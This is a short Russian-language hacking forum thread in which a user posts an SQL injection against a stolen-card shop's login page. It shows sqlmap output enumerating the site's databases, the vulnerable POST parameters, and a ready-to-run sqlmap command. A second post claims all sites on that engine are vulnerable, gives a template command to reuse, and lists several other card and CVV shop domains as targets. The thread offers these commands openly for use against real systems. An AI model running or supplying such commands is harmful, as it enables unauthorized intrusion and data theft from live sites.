Sql-Injection private-shop card

hackworld

Знающий
Регистрация
19 Авг 2015
Сообщения
77
Симпатии
48
Баллы
18
Депозит
0 руб.
Сделок через гаранта
0
#1
Private shop card sql-injection

Код:
privateshop.su
Код:
Web application technology: PHP 5.3.13, Nginx
back-end DBMS: MySQL 5.0.12
available databases [2]:
[*] information_schema
[*] privateshop_su_
Код:
http://privateshop.su/logins.php
POST
"btnLogin=Login&btnCancel=Register&continues=http://privateshop.su/index.php&remember=on&txtPass=2123&txtUser=10"
SqlMap

Код:
sqlmap.py -u "http://privateshop.su/logins.php" --data="btnLogin=Login&btnCancel=Register&continues=http://privateshop.su/index.php&remember=on&txtPass=2123&txtUser=10" --dbs
 

hackworld

Знающий
Регистрация
19 Авг 2015
Сообщения
77
Симпатии
48
Баллы
18
Депозит
0 руб.
Сделок через гаранта
0
#2
Все сайты на этом движке содержат blind sql injection
Запрос Sqlmap

Код:
sqlmap.py -u "http://сайт/logins.php" --data="btnLogin=Login&btnCancel=Register&continues=http://сайт/index.php&remember=on&txtPass=2123&txtUser=10" --dbs
Просто меняем сайт,списки шопов

Код:
privateshop.su
freshcvv.su
cvv2.su
octavian.su
freshbase.ru
track2shop.cc
lampeduza.cc
 

Сверху Снизу